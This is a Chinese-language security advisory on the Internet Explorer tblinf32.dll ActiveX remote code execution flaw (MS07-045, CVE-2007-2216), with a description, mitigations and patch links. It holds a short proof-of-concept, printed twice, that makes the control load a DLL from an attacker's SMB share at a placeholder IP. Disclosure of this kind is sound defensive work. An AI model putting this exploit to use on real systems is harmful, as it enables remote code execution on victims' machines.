安全研究

安全漏洞
Microsoft IE tblinf32.dll ActiveX控件远程代码执行漏洞(MS07-045)

发布日期:2007-05-08
更新日期:2007-08-15

受影响系统:
Microsoft Internet Explorer 7.0
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
Microsoft Internet Explorer 5.01
描述:
BUGTRAQ  ID: 25289
CVE(CAN) ID: CVE-2007-2216

Internet Explorer是微软发布的非常流行的WEB浏览器。

IE的tblinf32.dll ActiveX控件实现上存在漏洞,远程攻击者可能利用此漏洞控制用户系统。

IE中tblinf32.dll或vstlbinf.dll ActiveX控件没有正确地实现IObjectsafety。TlbInf32.dll是一组COM对象,允许Visual Basic和C++程序员访问类型库。该库实现了IObjectSafety:

   Report for Clsid: {8B217746-717D-11CE-AB5B-D41203C10000}
   RegKey Safe for Script: False
   RegKey Safe for Init: False
   Implements IObjectSafety: True
   IDisp Safe:  Safe for untrusted: caller,data

TypeLibInfoFromFile()函数用于打开文件并从中检索typelib信息:

   TypeLibInfoFromFile(ByVal FileName As String) As TypeLibInfo

这个函数会接受到DLL文件的webdav/smb共享,以便从远程服务器上的DLL检索信息。如果修改了TypeLibInfoFromFile()调用中的DLL文件将HelpStringDll属性定向到导出恶意DLLGetDocumentation函数的DLL,则在请求HelpString属性时就会执行这个函数。

   <object width00 height  classid="CLSID:<CLASSID>"
name=test></object>
   x= test.TypeLibInfoFromFile("\\\\IPADDRESS\\SHARE\\remote.dll")
   ' Call the remote DLLGetDocumentation function
   alert(x.Interfaces.Item(a).Members.Item(b).HelpString)

如果用户受骗访问了恶意站点的话就可能导致执行任意指令。成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限,那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。

<*来源:Brett Moore (brett.moore@SECURITY-ASSESSMENT.COM
  
  链接:http://secunia.com/advisories/26419/
        http://marc.info/?l=bugtraq&m=118727690131643&w=2
        http://www.microsoft.com/technet/security/Bulletin/MS07-045.mspx?pf=true
        http://www.us-cert.gov/cas/techalerts/TA07-226A.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<object width=1000 height=20 classid="CLSID:<CLASSID>"
name=test></object>
x= test.TypeLibInfoFromFile("\\\\IPADDRESS\\SHARE\\remote.dll")
' Call the remote DLLGetDocumentation function
alert(x.Interfaces.Item(a).Members.Item(b).HelpString)

建议:
临时解决方法:

* 将Internet Explorer配置为在Internet和本地Intranet安全区域中运行ActiveX控件之前进行提示
  
* 将Internet 和本地Intranet安全区域设置设为“高”,以便在这些区域中运行ActiveX控件和活动脚本之前进行提示

* 禁止在Internet Explorer中运行COM对象

厂商补丁:

Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS07-045)以及相应补丁:
MS07-045:Cumulative Security Update for Internet Explorer (937143)
链接:http://www.microsoft.com/technet/security/Bulletin/MS07-045.mspx?pf=true

浏览次数:3166
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客